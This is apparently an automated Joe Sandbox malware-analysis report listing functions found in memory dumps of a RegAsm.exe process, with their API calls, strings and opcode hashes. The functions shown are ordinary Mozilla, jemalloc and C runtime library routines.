Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoInitializeEx$combase.dll
API String ID: 4190559335-2063391169
Opcode ID: 9984828b2c3a0c76782c1eaeed74738d0e4065ecdc3770a658b887c8fb61f2fa
Instruction ID: 100b6d6b22ce8212f677e5344a19ec644697528194e1445e7a60799a9179033f
Opcode Fuzzy Hash: 9984828b2c3a0c76782c1eaeed74738d0e4065ecdc3770a658b887c8fb61f2fa
Instruction Fuzzy Hash: 5711ACB43052559BDF00CF68CA08E4A3BBCFB4E36AF24422DED05A2A40DB3CE401CA65

Function 6C2B62E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C2DAB89: EnterCriticalSection.KERNEL32(6C32E370,?,?,?,6C2A34DE,6C32F6CC,?,?,?,?,?,?,?,6C2A3284), ref: 6C2DAB94
Part of subcall function 6C2DAB89: LeaveCriticalSection.KERNEL32(6C32E370,?,6C2A34DE,6C32F6CC,?,?,?,?,?,?,?,6C2A3284,?,?,6C2C56F6), ref: 6C2DABD1

LoadLibraryW.KERNEL32(combase.dll), ref: 6C2B631B
GetProcAddress.KERNEL32(00000000,CoUninitialize), ref: 6C2B633A
__Init_thread_footer.LIBCMT ref: 6C2B634E
FreeLibrary.KERNEL32 ref: 6C2B6376

Strings

combase.dll, xrefs: 6C2B6316
CoUninitialize, xrefs: 6C2B6334

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoUninitialize$combase.dll
API String ID: 4190559335-3846590027
Opcode ID: ea8244fc3805bcecadb541ec11b23f883c96c30c5b7ec46df98779afead6087d
Instruction ID: 2a094e0ee2f64f3ee9ec08a3521138333dfa8d2f5c79b3abb9be7e00f153bd80
Opcode Fuzzy Hash: ea8244fc3805bcecadb541ec11b23f883c96c30c5b7ec46df98779afead6087d
Instruction Fuzzy Hash: A8014C74605316CBEF04CF28EA98A5477B8BB0E65AF24412DEE02D6A80D73CA441CF51

Function 6C2EF540 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C2E9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C2B4A68), ref: 6C2E945E
Part of subcall function 6C2E9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C2E9470
Part of subcall function 6C2E9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C2E9482
Part of subcall function 6C2E9420: __Init_thread_footer.LIBCMT ref: 6C2E949F

GetCurrentThreadId.KERNEL32 ref: 6C2EF559
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C2EF561

Part of subcall function 6C2E94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C2E94EE
Part of subcall function 6C2E94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C2E9508

GetCurrentThreadId.KERNEL32 ref: 6C2EF577
AcquireSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2EF585
ReleaseSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2EF5A3

Strings

[I %d/%d] profiler_resume, xrefs: 6C2EF239
[D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C2EF56A
[I %d/%d] profiler_pause_sampling, xrefs: 6C2EF3A8
[I %d/%d] profiler_resume_sampling, xrefs: 6C2EF499

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
API String ID: 2848912005-2840072211
Opcode ID: c2fe99c7d8561bf8b30ff48d1d0f3d2f5825d3c0a45f296a6248b415770fc907
Instruction ID: 8f2661708c45134447ab5007847e77b0773ef4dc2df476721dc785463fe7c94f
Opcode Fuzzy Hash: c2fe99c7d8561bf8b30ff48d1d0f3d2f5825d3c0a45f296a6248b415770fc907
Instruction Fuzzy Hash: 3DF0E9B5600204AFDF106F64E84899A777CEF8E26DF000019FE0697701CBBD5800CB70

Function 6C2EF600 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C2E9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C2B4A68), ref: 6C2E945E
Part of subcall function 6C2E9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C2E9470
Part of subcall function 6C2E9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C2E9482
Part of subcall function 6C2E9420: __Init_thread_footer.LIBCMT ref: 6C2E949F

GetCurrentThreadId.KERNEL32 ref: 6C2EF619
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C2EF598), ref: 6C2EF621

Part of subcall function 6C2E94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C2E94EE
Part of subcall function 6C2E94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C2E9508

GetCurrentThreadId.KERNEL32 ref: 6C2EF637
AcquireSRWLockExclusive.KERNEL32(6C32F4B8,?,?,00000000,?,6C2EF598), ref: 6C2EF645
ReleaseSRWLockExclusive.KERNEL32(6C32F4B8,?,?,00000000,?,6C2EF598), ref: 6C2EF663

Strings

[D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C2EF62A

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
API String ID: 2848912005-753366533
Opcode ID: e67db969c2e063a988fd459384f6dea7150ed9e00339e01f6ae7857f87678fc5
Instruction ID: bf71029f26949a0d8343e026c8805fdbf73b80e3df2cda16b91d4664ef219df0
Opcode Fuzzy Hash: e67db969c2e063a988fd459384f6dea7150ed9e00339e01f6ae7857f87678fc5
Instruction Fuzzy Hash: 71F05475200214ABDF006F65E84899A777DEB8E26DF500419FE0697741CBBD58058B75

Function 6C2B0E40 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(kernel32.dll,6C2B0DF8), ref: 6C2B0E82
GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6C2B0EA1
__Init_thread_footer.LIBCMT ref: 6C2B0EB5
FreeLibrary.KERNEL32 ref: 6C2B0EC5

Strings

GetProcessMitigationPolicy, xrefs: 6C2B0E9B
kernel32.dll, xrefs: 6C2B0E7D

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeInit_thread_footerLoadProc
String ID: GetProcessMitigationPolicy$kernel32.dll
API String ID: 391052410-1680159014
Opcode ID: 54cc27c582b198ed78e2e2addab469c66b7c178086c0824de2e4fa249bcbfc6f
Instruction ID: 624ddfd92eeea4f57402dd35a6170534318d7c905a65ea6051a50e112f09d224
Opcode Fuzzy Hash: 54cc27c582b198ed78e2e2addab469c66b7c178086c0824de2e4fa249bcbfc6f
Instruction Fuzzy Hash: 260124B07003AACBDF018FECDA94F6237B9E74A79AF10052DED81A6B40D73CB4058A11

Function 6C2E05F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6C2DCFAE,?,?,?,6C2A31A7), ref: 6C2E05FB
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6C2DCFAE,?,?,?,6C2A31A7), ref: 6C2E0616
strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6C2A31A7), ref: 6C2E061C
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6C2A31A7), ref: 6C2E0627

Strings

<jemalloc>, xrefs: 6C2E05FA, 6C2E060F
: (malloc) Error in VirtualFree(), xrefs: 6C2E061B, 6C2E0625

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: _writestrlen
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 2723441310-2186867486
Opcode ID: 8a1ae9c7b6ba38c679bb04a916baa96b5573a28e66ed66fbdb7168d133698752
Instruction ID: 2c6462e23259a1426d1ea8d25f6cf7a172854820d559bfd16826f8a5d83bf9e4
Opcode Fuzzy Hash: 8a1ae9c7b6ba38c679bb04a916baa96b5573a28e66ed66fbdb7168d133698752
Instruction Fuzzy Hash: 5BE08CE2A050503BF5182256BC86DBB761CDBC6138F080039FD0D82701E94EAD1A95F7

Function 6C2F9240 Relevance: 9.3, APIs: 6, Instructions: 289timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C2F9BAE
free.MOZGLUE(?,?), ref: 6C2F9BC3
free.MOZGLUE(?,?), ref: 6C2F9BD9

Part of subcall function 6C2F93B0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C2F94C8
Part of subcall function 6C2F93B0: free.MOZGLUE(6C2F9281,?), ref: 6C2F94DD

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: 61f0e42ff6537f9bcfd923a1a18f90c149cdcdebad07b23451c9e33b0dc842c1
Instruction ID: c07e32537ed7908a90976db56e00ac47e67eca48678c7a91b6ff72090b1b9b65
Opcode Fuzzy Hash: 61f0e42ff6537f9bcfd923a1a18f90c149cdcdebad07b23451c9e33b0dc842c1
Instruction Fuzzy Hash: 83B1AE71A0474D8BCB01DF58C88059EF3F5BFC9328B148629EC69AB740DB31E956CB92

Function 6C2B05F0 Relevance: 9.2, APIs: 6, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2880045a62961361945dc02269c28cd09da5a1d9f8cf516930760226c534c29e
Instruction ID: f6049eaafd581b798e93ea6b62bfdefa1d85d59a1796eec82690bdaaf76fa747
Opcode Fuzzy Hash: 2880045a62961361945dc02269c28cd09da5a1d9f8cf516930760226c534c29e
Instruction Fuzzy Hash: 18A139B0A00749CFDB14CF29C694A99FBF5BF49308F44866ED84AA7B00E734A945CF90

Function 6C2E71A0 Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 212COMMON

Download Yara Rule

APIs

Part of subcall function 6C2E6060: moz_xmalloc.MOZGLUE(00000024,50149709,00000000,?,00000000,?,?,6C2E5FCB,6C2E79A3), ref: 6C2E6078

free.MOZGLUE(-00000001), ref: 6C2E72F6
free.MOZGLUE(?), ref: 6C2E7311

Strings

Copied unique strings, xrefs: 6C2E7320
Spliced unique strings, xrefs: 6C2E7340
333s, xrefs: 6C2E731B
333s, xrefs: 6C2E7226

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: free$moz_xmalloc
String ID: 333s$333s$Copied unique strings$Spliced unique strings
API String ID: 3009372454-760240034
Opcode ID: 362931f2df0098a7d3b093dbd28c2b56ca81a2490fc025f69a12e2728498a01d
Instruction ID: 6d37de56ddb9700d6868358b4c4699e51828c1b417018dda1e2a99e6575b6ad7
Opcode Fuzzy Hash: 362931f2df0098a7d3b093dbd28c2b56ca81a2490fc025f69a12e2728498a01d
Instruction Fuzzy Hash: CF718271F002198FDB09CE69D89069DB7F2AF88704F65812DDC0AAB711DB35A946CB81

Function 6C3014A0 Relevance: 9.2, APIs: 6, Instructions: 176threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C3014C5
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C3014E2
GetCurrentThreadId.KERNEL32 ref: 6C301546
InitializeConditionVariable.KERNEL32(?), ref: 6C3015BA
free.MOZGLUE(?), ref: 6C3016B4

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
String ID:
API String ID: 1909280232-0
Opcode ID: 823fca07725448fb103d5828f852e4280c41b1ce1e374513455a442d17f349a5
Instruction ID: f2394f2bb0a1234ff2404b9119d5422a9c2a8b1036b919241063e304f8f64c4a
Opcode Fuzzy Hash: 823fca07725448fb103d5828f852e4280c41b1ce1e374513455a442d17f349a5
Instruction Fuzzy Hash: 2661E072A007589FDB219F24C880BDEB7B5BF8A308F44851CED8A5B711DB35E949CB91

Function 6C2FC160 Relevance: 9.2, APIs: 6, Instructions: 174COMMON

Download Yara Rule

APIs

fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C2FC1F1
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C2FC293
fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C2FC29E

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: fgetc$memcpy
String ID:
API String ID: 1522623862-0
Opcode ID: 714135dd38920df1e2d39c7c05fa6b0cd185dc09758c3256e8d8f67fe582ddc9
Instruction ID: cec52fc70b0cde2b05e94ca2a3afbf3e41043dba28a546d70cf1e02334a73c35
Opcode Fuzzy Hash: 714135dd38920df1e2d39c7c05fa6b0cd185dc09758c3256e8d8f67fe582ddc9
Instruction Fuzzy Hash: 6961DC71A4021CCFCF25DFA8D8809AEFBB5FF49725F154529E822A7650C731A946CFA0

Function 6C2F9F40 Relevance: 9.2, APIs: 6, Instructions: 157timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C2F9FDB
free.MOZGLUE(?,?), ref: 6C2F9FF0
free.MOZGLUE(?,?), ref: 6C2FA006
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C2FA0BE
free.MOZGLUE(?,?), ref: 6C2FA0D5
free.MOZGLUE(?,?), ref: 6C2FA0EB

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: 729db5584c90fd2cf788f15fe1320518118415d2d28aabeff599163b1c5cccf7
Instruction ID: 3ed92cb8ff2b21f3dc4141e39f857f0de78332b488c6912413a41e60f7d11055
Opcode Fuzzy Hash: 729db5584c90fd2cf788f15fe1320518118415d2d28aabeff599163b1c5cccf7
Instruction Fuzzy Hash: CA61927550860A9FC751CF18C48059AB3F5FF84329F54466DEC699B702EB32E986CB82

Function 6C2FDC50 Relevance: 9.1, APIs: 6, Instructions: 104timethreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C2FDC60
AcquireSRWLockExclusive.KERNEL32(?,?,?,6C2FD38A,?), ref: 6C2FDC6F
free.MOZGLUE(?,?,?,?,?,6C2FD38A,?), ref: 6C2FDCC1
ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C2FD38A,?), ref: 6C2FDCE9
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C2FD38A,?), ref: 6C2FDD05
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C2FD38A,?), ref: 6C2FDD4A

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 1842996449-0
Opcode ID: 7b4e1c6db60ab5be911bbf32972bc1f1c484d5e7a5ef73817ab1f07624370cfb
Instruction ID: 54d2e8f9fdd2d611b21bdcd0711974da93fd4927c159e2f0a614239de0ee63b4
Opcode Fuzzy Hash: 7b4e1c6db60ab5be911bbf32972bc1f1c484d5e7a5ef73817ab1f07624370cfb
Instruction Fuzzy Hash: 984147B5A0020A8FCB40CF99C88099AF7B5FF89318B654569ED56ABB11D731FC01CBA0

Function 0041B38C Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 0041B39A

Part of subcall function 0041AFAC: __mtinitlocknum.LIBCMT ref: 0041AFC2
Part of subcall function 0041AFAC: __amsg_exit.LIBCMT ref: 0041AFCE
Part of subcall function 0041AFAC: EnterCriticalSection.KERNEL32(?,?,?,0041AC60,0000000E,0042A0E0,0000000C,0041AC2A), ref: 0041AFD6

DecodePointer.KERNEL32(0042A120,00000020,0041B4DD,?,00000001,00000000,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E), ref: 0041B3D6
DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0E0,0000000C,0041AC2A), ref: 0041B3E7

Part of subcall function 0041BE35: EncodePointer.KERNEL32(00000000,0041C063,004495B8,00000314,00000000,?,?,?,?,?,0041B707,004495B8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041BE37

DecodePointer.KERNEL32(-00000004,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0E0,0000000C,0041AC2A), ref: 0041B40D
DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0E0,0000000C,0041AC2A), ref: 0041B420
DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0E0,0000000C,0041AC2A), ref: 0041B42A

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2005412495-0
Opcode ID: 0b0bc3cab5f7049983f26cd80e00dd0aa4f75dbf31a2a29bc74296bdc4549019
Instruction ID: 13f01492c0df899e955246e6d1acdef18d299a0ed6057d30a0a2a93d2b0efa88
Opcode Fuzzy Hash: 0b0bc3cab5f7049983f26cd80e00dd0aa4f75dbf31a2a29bc74296bdc4549019
Instruction Fuzzy Hash: D6312874901349DFDF109FA9C9452DEBAF1FF48314F14802BE414A6262CBB94895DFAE

Function 6C2A39A0 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C32E744,ew0l,00000000,ew0l,?,6C2C6112), ref: 6C2A39AF
LeaveCriticalSection.KERNEL32(6C32E744,?,6C2C6112), ref: 6C2A3A34
EnterCriticalSection.KERNEL32(6C32E784,6C2C6112), ref: 6C2A3A4B
LeaveCriticalSection.KERNEL32(6C32E784), ref: 6C2A3A5F

Strings

\2l, xrefs: 6C2A3A02
ew0l, xrefs: 6C2A39A3, 6C2A39A5

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
